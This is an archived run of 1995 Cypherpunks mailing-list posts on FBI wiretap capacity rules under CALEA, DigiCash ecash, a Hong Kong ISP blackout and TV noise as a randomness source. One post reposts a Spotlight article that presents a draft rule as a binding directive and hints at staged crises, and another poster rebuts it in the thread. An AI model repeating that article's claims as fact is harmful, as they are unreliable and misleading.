going places on airplanes to talk to other people and type on other keyboards,
and occasionally handing people piles of collated and stapled dead trees,
a racket for which people pay my employer lots of money***.  Where's the value?
When was it added?  If the Tax Collectors don't see people handing my employer
lots of money, can they demonstrate how much money they can confiscate?



- - - - - -

* this misses payments to foreign owners and taxes on foreign customers,
but any government foolish enough to discourage investment by foreigners
and sales to foreign customers deserves to be blamed heavily for lost jobs..

** US businesses spend approximately 40% as much calculating taxes as they
do _paying_ them...

*** My previous employer was very good at taking metal, sand, and fermented
dinosaur parts, and shaping them into boxes and strings that people would 
give them money for; they were extremely optimistic that they could get lots
of people to also pay them money for sending them people to talk about boxes
and strings and getting other people to pay _them_ for talking and banging
on keyboards.  They shouldn't have been quite so optimistic, and now
I'm in the racket on my own, having not yet acquired overseas corporations
to shelter my income through :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 14:38:20 +0800
To: cypherpunks@toad.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951102220145.25597C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm@cnct.kom wrote:

> Thanks for this item!  Two little excerpts jump out at me.

Gee, I hope they didn't spook you too badly when they jumped out at you 
like that. I can tell you're a little jumpy.

> > Last year, federal and state courts authorized 1,154 wiretaps, of which
> > 48 percent
> 
> [snip]
> 
> > "People are starting to say that seems awfully high," Dempsey said, noting 
> > that
> > the overall level of such surveillance activity is now a total of 20,000 
> > to 25,000
> > intercepts nationwide over an entire year.
> 
> So what is it?  1,154 wiretaps?  Or 20,000?

Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both 
wiretaps and other interceptions, i.e., recording which phone numbers you 
call but not actually listening to the conversations.

Get out of Dodge.

> FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
> for the data to support those numbers.  The FBI refused to release them 
> until the year 2002.
> 
> The FBI is being sued under FOIA to support Freeh's sworn testimony.  (Of
> course, he used different numbers at different times....)

By whom is the FBI being sued? What is the case number? Who are the 
lawyers? What are their Bar numbers? How many times have they been 
disciplined for bringing frivolous suits?

> One last thing.
> 
> What's so special about the year 2002?  

Obviously, it is two elections from now, when the UN will invade the US 
to impose the rule of the Anti-Christ.

Oops, I wasn't supposed to say that.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJmyX43DXUbM57SdAQGSpAQAw5sutFZdFyNu24bU1Pvd5n/BitCO/6/X
7ZywmguZTtduCCjfvAe2zD7KWu/Mlxrm3ATQSnUH6Vyjr1BAo/TnbrZzjdjWRQw1
S8n7PtLbDiHPOxgocC4JYnITYO5Lasx81V5lhJv5ifC0W8QGaqdLIZnfvws4K/N+
ONHnqzjRwSc=
=FSoO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 4 Nov 1995 19:30:56 +0800
To: clarkm@cnct.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030709.XAA23931@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 AM 11/3/95, clark.matthews@paranet.org wrote:
>Thanks for this item!  Two little excerpts jump out at me.  They follow:
>> Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
>> percent ....
>> "People are starting to say that seems awfully high," Dempsey said, noting that
>> the overall level of such surveillance activity is now a total of 20,000 
>> to 25,000 intercepts nationwide over an entire year.

>So what is it?  1,154 wiretaps?  Or 20,000?

Perhaps that's 1154 wiretap victims, with an average of 20 intercepts each?

In a separate article, Clark posted estimates that ranged from
500K - 1.5M people could be wiretapped, depending on how many people
are in the 1%/.5%/.25% zones.  It's worse than that - if they're tapping
the average victim for (say) 3 months, that's 4 times as many victims....
And just how many cops do they plan to hire to watch all these phones?
Computers can help some, especially for data, but who's going to read it all,
even after the fancy pattern recognition systems pick out the possible good
stuff.

>FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
>for the data to support those numbers.  The FBI refused to release them 
>until the year 2002.  [....]
>One last thing.
>What's so special about the year 2002?  

Statute of limitations?  :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 15:50:12 +0800
To: clarkm@cnct.com
Subject: [NOISY] Re: Clinton Administration Plans 1.5 MILLION WIRETAPS
In-Reply-To: <9511030814.AA0039@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951102221403.25597D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm@cnct.com wrote:

Ah, Clark graces us with his presence. See articles
<46kf2u$4ck@mars.cnct.com> and <45ch8o$915@mars.cnct.com>. I especially
enjoyed <44l7r9$dsv@mars.cnct.com>.

>                        From THE SPOTLIGHT
>                   300 Independence Avenue, S.E.
>                       Washington, DC  20003

Here's a little more information on this fine publication, which is in the
forefront of the struggle to expose the truth about the United Nations'
responsibility for the bombing of the Oklahoma Federal Building. Note the
second Library of Congress topic classification. The Spotlight is often
cited in alt.revisionism. Larger University libraries usually carry it;
I know Stanford and Berkeley do.

TITLE:    Spotlight (Washington, D.C.)
          The Spotlight.
          The Spotlight (Washington)
IMPRINT:  Washington, Liberty Lobby.
          v. ill. 39 cm.
TOPICS:   United States--Politics and government--1969---Periodicals.
          Antisemitism--Periodicals.
          Conservatism--United States--Periodicals.
NOTES:    Weekly (except two issues combined into one at beginning of year)
          v. 2, no. 16-     Apr. 19, 1976-
          Continues: National spotlight
          Language: English   Year: 1976-
          ISSN 0191-6270

>                       Technology & Liberty
>                         November 13, 1995
> 
> 
>       ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS
> 
>                         By Clark Matthews
>                    clark.matthews@paranet.org
> 
> Janet Reno's Justice Department and the FBI have directed U.S.
> telephone companies to prepare for up to 1.5 million
> simultaneous, electronic intercepts on Americans' telephones.

This is not true. This is a trial balloon, not a directive;  it's a first,
wet dream draft at the beginning of a public comment period. It is dead 
on arrival.

It will not be implemented, not if we have any say in the matter, and we
do. Please do chime in, though, based on EPIC's responsible analysis and
recommendations. 

> The same directive requires the nation's phone companies to
> complete the necessary modifications to their equipment to create
> this massive surveillance apparatus from America's public
> telephone networks.  Telephone companies are directed to have
> these capabilities in place by October 28, 1998, one week before
> the 1998 elections.

This is not true.

[Tin-foil-hat-tinged plagiarism of EPIC's alert deleted]

> The administration's eavesdropping diktats are buried in a set of
> technical "capacity requirements" that telephone companies are
> expected to meet in order to comply with the CALEA law.  The
> capacity requirements appear on pages 53643-53646 of the Federal
> Register for October 16, 1995.  Computer users can access this
> document electronically on the internet from the Electronic
> Privacy Information Center (http://www.epic.org) or by using wais
> (wais.access.gpo.gov).

The second and third sentences are true. If you are a US citizen (natural 
born White Sovereign State Citizen or otherwise), please follow up on 
them. Let your voice be heard.

The first sentence has at least four readily apparent logical and 
factual flaws.

> or businesses.  They can also be programmed to monitor telephone
> conversations, intercept faxes, and record communications
> sessions between computer modems, including computer passwords
> and digital transactions.

Not if they're encrypted, they can't :-)

> Here is a breakdown of the scope of the federal surveillance
> described by the capacity requirements:

[All plagiarized from the EPIC alert; a few errors, but nothing major]

> And since "major cities" are "high interest" areas, the actual
> number is more likely to approach one million or more.  Even
> these figures don't tell the whole story.  The Justice Department
> directives have a built-in vagueness that allows areas to be re-
> defined.  They can become "high-interest" hotspots at any time,
> under any circumstances.  A currency crisis, for instance.  Or a
> hotly contested election.  Or perhaps a mysterious bombing
> provocation in the midwest.

This is completely untrue. Cite please?

> Furthermore, telephone companies do not have the luxury of
> meeting the minimum surveillance requirements.  It's a
> technological reality that they must modify their equipment to
> meet the maximum requirements.  That's because the FBI can re-
> define their surveillance responsibilities at any time, by
> branding their customers as "interesting".  

Cite?
 
>                    WRITE YOUR REPRESENTATIVES

Yes, please do. The facts are rather disturbing. Clark's transcription 
leaves a little to be desired, so I quote EPIC:

WHAT YOU CAN DO:

(a) Express support for Rep. Bob Barr (R-GA), a former federal prosecutor 
and leading Congressional
opponent of the FBI's request for wiretap funding: 

     Rep. Bob Barr
     U.S. House of Representatives
     1607 Longworth Building
     Washington, DC 20515
     (202) 225-2931


(b) Submit comments to the FBI. Object to the "percentage approach" to
wiretap capacity. Urge the FBI to follow the current measurement of
wiretapping, as reported annually by the Administrative Office of the U.S.
Courts, which considers the actual number of wiretaps authorized. If you
are a telephone customer, ask the FBI to address the privacy risks of
unauthorized, illegal, or excessive wire surveillance. Comments should be
submitted in triplicate to the Telecommunications Industry Liaison Unit
(TILU), Federal Bureau of Investigation, P.O. Box 220450, Chantilly, VA
22022-0450. Send copies of your comments to EPIC (alert@epic.org) and
Congressman Barr. 

                 ** Comments must be received by November 15, 1995. **

(c) If you represent or work for a telecommunications company, equipment
manufacturer, or service provider, assess carefully the cost and liability
that this proposed federal regulation may impose on your company and the
risk that it may expose your customers to illegal wiretapping. If you are
interested in challenging the final FBI rule, contact EPIC. 

[BUAF of a birdie deleted]

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJnAZ43DXUbM57SdAQF5cAP8CebPae9psvfau4nUGUr0bi81cuqQEjlb
jm0va0q3tlRV18Xd+vXUOjjd6+Mwkjfd0kh74q2IUWbSVHA2ECy5sHgF5oGoSiLP
WJdh3nTGlrtrj/oiYQloaun/lUiq27L4Z6sQPNNNwNmldt8zzPCRJUBACBg0+qLS
kmxvepC/7Uo=
=3F8Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 3 Nov 1995 14:36:15 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: [NOISE] Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <Pine.LNX.3.91.951103114116.20782B-100000@ima.net>
Message-ID: <199511030614.XAA02702@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> On Thu, 2 Nov 1995, Rich Graves wrote:
> 
> > > 
> > >    In Hong Kong, the Internet wasn't quite strangled, but the British
> > > authorities who control that colony managed to throttle free electronic
> > > speech with the rest of the world until everything was bottlenecked into
> > > a few little-known satellite links.
> > 
> > Hmm, few specifics here. I wonder if they would care to elaborate. Nah.
> 
> Don't waste your time with that idiot, he doesn't know what he's talking
> about. The 1-week partial black-out here in Hong Kong happened because some
> providers had ignored some licencing requirements, and has been quickly
> solved once they agreed to comply.


That's one way to look at it.  Of course since the "license 
requirements" had to do with some obscure administrivia that nobody
thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong
had thought to apply for it.  One has to wonder why the gov't pulled
the plug on 5 of them without so much as a warning, much less a
chance to comply.


Did I say 5?  Oh yes.  The largest HK ISP-- and the one with closest
ties to the government-- had gone ahead and applied for the license
just a couple of weeks before the blackout.  Corruption is the modus
operandi in HK, so I wouldn't be at all surprised if that one ISP
got a special favor by being warned of the impending black-out, or
even if it had a hand in instigating it.


I'm sure you'll correct me if I've got any of my facts wrong.


(c'punks relevance:  (parts of) the Net is still vulnerable to
governmental blackout.  Is this relevant?  Well, hardly, but perhaps
interesting.  And at least I flagged it.)


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJmy8PWZSllhfG25AQHUygP/QKCwtGlzRRaJtCANUgiJgt+noq0RJKWe
zpthAqKRJEa0kP1/zZBkk0Qkj/+HJWAJZ1+i/9R887cDkyD8JZSu2XJ4pXB4mpsv
9rgxH4ffj8oxvy9e313/Z7C2zm7x1O3dwvnkKDojg8LuUBCTvHxZo5iwKXNqExYv
w/B0Fxbv0V8=
=BPjm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 12:50:06 +0800
To: cypherpunks@toad.com
Subject: Radiation Detectors from Aware Electronics
Message-ID: <199511030430.XAA07086@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



There have been several requests for information on the company that
makes the radiation detectors with RS232 interfaces that I mentioned.

Here is how to reach them:

Aware Electronics
P.O. Box 4299
Wilmington, DE 19807
Phone (800) 729-5397
      (302) 655-3800


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 14:55:37 +0800
To: cypherpunks@toad.com
Subject: Re: What!!!
Message-ID: <acbef6c303021004c367@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM 11/2/95, tony266@vabeach.email.net wrote:

>Can someone tell me this cypherpunks is all about???

Grammar not best subject his. List sense make after read for time.

--Klaus!

More seriously, when you subscribed you undoubtedly got a "Welcome"
message. I suggest you read it.

Reading topics that interest you on the list is the best way to learn what
it "is all about." The Cypherpunks list archives and Cyphernomicon are also
useful. They are in various places, including these Web sites:

http://www.hks.net/cpunks/index.html

http://www.oberlin.edu/~brchkind/cyphernomicon/

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Sun, 5 Nov 1995 02:53:55 +0800
To: cypherpunks@toad.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511030810.AA0038@cnct-gw.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for this item!  Two little excerpts jump out at me.  They follow:

> Last year, federal and state courts authorized 1,154 wiretaps, of which
> 48 percent

[snip]

> "People are starting to say that seems awfully high," Dempsey said,
> noting that the overall level of such surveillance activity is now a
> total of 20,000 to 25,000 intercepts nationwide over an entire year.

So what is it?  1,154 wiretaps?  Or 20,000?

FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
for the data to support those numbers.  The FBI refused to release them 
until the year 2002.

The FBI is being sued under FOIA to support Freeh's sworn testimony.  (Of
course, he used different numbers at different times....)

One last thing.

What's so special about the year 2002?  

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Sat, 4 Nov 1995 19:29:05 +0800
To: clarkm@cnct.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <Pine.LNX.3.91.951103000534.12413A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
> for the data to support those numbers.  The FBI refused to release them 
> until the year 2002.
> 
> What's so special about the year 2002?  

Maybe he plans to retire and leave the country by then.. to find a more 
secure, less invasive Gov't to live under.. ;)

RobL
Rockford, Wa





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Fri, 3 Nov 1995 13:33:13 +0800
To: cypherpunks@toad.com
Subject: Clinton Administration Plans 1.5 MILLION WIRETAPS
Message-ID: <9511030814.AA0039@cnct-gw.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain




                      Used with Permission

                       From THE SPOTLIGHT
                  300 Independence Avenue, S.E.
                      Washington, DC  20003

                 Subscriptions:  (202) 546-5621


                      Technology & Liberty
                        November 13, 1995


      ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS

                        By Clark Matthews
                   clark.matthews@paranet.org

Janet Reno's Justice Department and the FBI have directed U.S.
telephone companies to prepare for up to 1.5 million
simultaneous, electronic intercepts on Americans' telephones.

The same directive requires the nation's phone companies to
complete the necessary modifications to their equipment to create
this massive surveillance apparatus from America's public
telephone networks.  Telephone companies are directed to have
these capabilities in place by October 28, 1998, one week before
the 1998 elections.

The Clinton administration's claimed authorization for this
massive high-tech domestic surveillance machine is the 1994
Communications Assistance for Law Enforcement Act (CALEA).  The
CALEA law is better known as the infamous "Wiretap Access Bill",
which has been discussed many times in these columns over the
past 14 months.  The CALEA law continues to be a hot topic
because the proposed "Omnibus Counter-Terrorism Bill" of 1995
(H.R. 1710) contains provisions for setting up a national FBI
surveillance center and paying for the national eavesdropping
system with a 40% surcharge on all federal civil fines and
property seizures.  

                     "CAPACITY REQUIREMENTS"

The administration's eavesdropping diktats are buried in a set of
technical "capacity requirements" that telephone companies are
expected to meet in order to comply with the CALEA law.  The
capacity requirements appear on pages 53643-53646 of the Federal
Register for October 16, 1995.  Computer users can access this
document electronically on the internet from the Electronic
Privacy Information Center (http://www.epic.org) or by using wais
(wais.access.gpo.gov).

The "Capacity Requirements" published in the Federal Register
correspond to a minimum of 540,000 and a maximum of 1.5 million
simultaneous telephone "intercepts" in the United States.  These
electronic "intercepts" involve several different telephone
surveillance techniques.  They can record the telephone numbers
you call and the numbers of people who call you, and then match
the phone numbers in a special database "associating" you with
your friends, relatives, acquaintances, journalists, activists,
or businesses.  They can also be programmed to monitor telephone
conversations, intercept faxes, and record communications
sessions between computer modems, including computer passwords
and digital transactions.

Here is a breakdown of the scope of the federal surveillance
described by the capacity requirements:

 *   Category 3 -- In 75% of the nation, phone companies must be
     prepared to activate federal intercepts on a maximum of
     0.25% of all telephone subscribers, i.e. 250 telephones out
     of every 100,000.

 *   Category 2 -- Is ill-defined.  Phone companies in Category 2
     areas must make their equipment capable of supporting
     federal interceptions on a maximum of 0.5% of all
     subscribers, i.e. 500 telephones per 100,000

 *   Category 1 -- Includes ill-defined "high interest" areas
     like major cities, where phone companies must be prepared to
     surveil 1% of all telephones, i.e. 1,000 phones per 100,000 

                       WHAT THE NUMBERS MEAN

According to FCC statistics for 1993, there were at least 150
million telephone numbers in our country -- and these figures
omitted cellular phones, beepers, pagers, WATS lines, and other
non-switched telephone services.  Therefore Category 3 translates
into 0.25% of at least 112.5 million telephones -- 281,250
intercepts nationwide.  Assuming Category 2 equals 15% of the
nation's phones, it translates into 0.5% of 22.5 million phones,
another 122,500 potential wiretaps.  Category 1 is 1% of the
remaining 15 million phones:  that's 150,000 more people.  Add it
up: 553,750 intercepts, minimum.

And since "major cities" are "high interest" areas, the actual
number is more likely to approach one million or more.  Even
these figures don't tell the whole story.  The Justice Department
directives have a built-in vagueness that allows areas to be re-
defined.  They can become "high-interest" hotspots at any time,
under any circumstances.  A currency crisis, for instance.  Or a
hotly contested election.  Or perhaps a mysterious bombing
provocation in the midwest.

Furthermore, telephone companies do not have the luxury of
meeting the minimum surveillance requirements.  It's a
technological reality that they must modify their equipment to
meet the maximum requirements.  That's because the FBI can re-
define their surveillance responsibilities at any time, by
branding their customers as "interesting".  

As the FBI's "interest" shifts from area to area, the whole
country could rapidly come under the 1% surveillance directive.
1.5 million telephone intercepts.  Or more.

                      'ONLY 1,157 WIRETAPS'

The conduct of Clinton's law-enforcement leaders is especially
outrageous, now that the true intentions of their KGB-like
program have been revealed.  When FBI Director Louis Freeh
lobbied Congress for the Wiretap Bill last year, he cited FBI
statistics claiming only 1,157 federal, state, and local
electronic surveillance orders for all of 1993.  

In sworn Congressional testimony, the FBI director went on to say
that his bureau had been thwarted in "several" attempts to
intercept communications on specialized telephone equipment.
Freeh cited obstacles like digital switches, digital loops, and
similar privately owned, computerized business telephone
switching systems, which he claimed prevented his agents from
listening to telephone conversations, intercepting faxes, and
capturing the data exchanged in computer modem sessions.

The built-in interception capacity of at least 1.5 million phone
subscribers is well over 1,000 times the 1993 wiretapping number
given to Congress by Director Freeh. 

                   WRITE YOUR REPRESENTATIVES

The Justice Department instructed America's telephone companies
to respond by November 15th in writing (in triplicate) with
comments on their new national telephone surveillance
requirements.  Why not ask your elected representatives to drop
them a line, too?  Your Senators and Representative may well
wonder how Louis Freeh's 1,157 1993 surveillance orders and
"several" failed eavesdropping attempts turned into a license to
monitor over a million phones in the nation's telephone system in
less than two years.  I sure do wonder.

The "capacity requirements" for the 1994 Wiretap Law (CALEA) were
published in the Federal Register of October 16.  They are listed
on pages 53643-53646.  The address for comments is:
Telecommunications Industry Liaison Unit (TILU), Federal Bureau
of Investigation, P.O. Box 220450, Chantilly, VA 22022-0450.  The
FBI expects your representatives to write in triplicate.



     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 19:31:13 +0800
To: cypherpunks@toad.com
Subject: Re: video as a source of public randomness
Message-ID: <acbf02ca0402100496c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:23 AM 11/3/95, JMKELSEY@delphi.com wrote:

>>From: tcmay@got.net (Timothy C. May)
>>Subject: Re: Video as a source of randomness
>
>>Digitized video input, especially from something like a noisy channel (t.v.
>>channel, for example), is quite likely to produce a lot more entropy bits
>>per second than nearly any of us ever need. (One's PGP key could be seeded
>>in a fraction of a millisecond, for example.)
>
>This seems like a potential source of a stream of public random
>bits.  If these can be authenticated and matched, this kind of thing
>can be useful in a lot of protocols.  For example, if there is some

I'm not sure what you mean by "public random bits"...I don't plan to share
my random bits with anyone, nor do I see any need for "public" random bits
(except for some well-known situations involving statistical testing, for
which certain PRNGs are actually preferable to "real" random numbers).

And so there's no confusion, when I said "like a noisy channel (t.v.
channel, for example)" I meant a snowy, noisy picture such as one gets with
rabbit ears on top of the set, especially when the channel is an unused
one. It is unlikely in the extreme that any attacker could deduce the snowy
pixel values used in the distillation of entropy.

(I'm not claiming this is the most practical source of randomness; I was
just responding to an earlier post about this.)

But back to the subject of "public random bits." Could you elaborate on
what you mean by this? (I assume you don't mean a one time pad that Alice
and Bob share, since that is really a separable issue from video as a
source of randomness. Only one of them will generate the pad, and will then
securely communicate it to the other.)

What am I missing?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 3 Nov 1995 10:11:43 +0800
To: hallam@w3.org
Subject: Re: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022349.AA01867@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

 > >So, refuse to buy their money.
 > >Demand open systems.
 > One problem a number of people have reported in DigiCash is disappearing 
 > money. Several people have reported that if a transfer is misconfigured
 > the cash can flow out of the wallet, be rejected at the other end and
 > disappear from the system - i.e. misprinted names on cheques mean lost cash!
No. Please get first-hand facts. I have 'laundered' more than e$
18000, by small amounts of a couple of e$, and *no* bucks were lost(1). I
do have to manually cancel some and to refund ppl from time to time,
and I must admit I'm a bit behind my mail answering about that... but
the money is *not* lost [for everybody]
 > This is bad and they report that Digicash did not respond to their
 > complaints.

They prolly addressed the complaints to the wrong ppl; money does not
disappear as long as you keep the log files to be able to "cancel"
'lost' ebucks

There are/were a couple of small problems with the ecash software, but
no money is lost, as long as you have a consistent file system
[and I think they are working on an "auto recovery/auto cancel"
feature...]

note that there are some problems, initially the proposed shop
software sucked for instance... and writing a better one was a key to
get the system better, maybe it is a bit too early for real bank
also... I think some bugs are still hanging around... but the idea is
great ! [i just wish to have sources/protocol fully disclosed before I
put real money in it...]

ps : I have no interest in digicash whatsoever except being a participant
in the trial and having a small shop {and thus having a fairly large
account ;-)  I wish they give prices to 'good' shops ;-0)}

note1: at least I think no bucks were lost... not a high percentage at
least,... I did have some trouble with the first software version and
managed to *almost* lose stuff, my mismanipulation... but hey... if
your wallet has a hole, or if you throw away your money, you won't
whine to the ATM, would you ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic PLO Legion of Doom explosion Cocaine Castro Croatian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 16:00:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <199511030603.BAA24442@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


clarkm@cnct.com writes:
> > Last year, federal and state courts authorized 1,154 wiretaps, 
[...]
> > "People are starting to say that seems awfully high," Dempsey said, noting 
> > that the overall level of such surveillance activity is now a total of 
> > 20,000 to 25,000 intercepts nationwide over an entire year.
> 
> So what is it?  1,154 wiretaps?  Or 20,000?

For one thing, many conversations on a line may be intercepted over time
after the initial wiretap order is given. Also wiretapping is not the only 
form of electronic surveillance that tends to get reported in these numbers. 

The official federal wiretap reports for the last several years place the
number of wiretaps in the neighborhood of 1,000+ in each of those years. 

Actually the number 20,000 sounds strange -- it seems too high merely to be
a total of surveillance orders/operations, yet far too low to count all
interceptions. I recently heard the total number of conversations intercepted
per year in the U.S. estimated on the order of 2,000,000. Some rather small
percentage of those were categorized as "incriminating". I suppose it might
have been 1%, which would work out to 20,000 incriminating intercepted calls
per year nationwide.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 19:30:50 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <acbf085205021004e36c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:43 PM 11/2/95, Carl Ellison wrote:
>>Date: Thu, 2 Nov 1995 00:39:29 -0800
>>From: tcmay@got.net (Timothy C. May)
>
>>Digitized video input, especially from something like a noisy channel (t.v.
>>channel, for example), is quite likely to produce a lot more entropy bits
>>per second than nearly any of us ever need. (One's PGP key could be seeded
>>in a fraction of a millisecond, for example.)
>
>My cable feed into my Mac, for example, has surprisingly little noise --
>and it's only local noise (stuff only at my house, not available to the
>eavesdropper) which counts as entropy.

I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
rabbit ears, or nothing (since the idea is to get noise, from the ether, or
from the tuner itself). A snow-filled picture has pixels which are unlikely
in the extreme to be predicted/deduced by outside attackers, who cannot
know the details of antenna orientation, microscopic variations in
geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
guessable.

(I'm not convinced that _cable_ signals are not random enough: my cable
picture is far from perfect, and my specific cable configuration and tuner
variations are certainly contributing to variability of the image pixels.
Granted, regularities in the image that are known to attackers--this is all
in theory, of course--will serve to reduce the entropy. But there's so much
bandwidth to burn that I suspect that even cable signals are OK to use. Of
course, removing the cable input is trivial and produces a spectacularly
snowy set of images....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
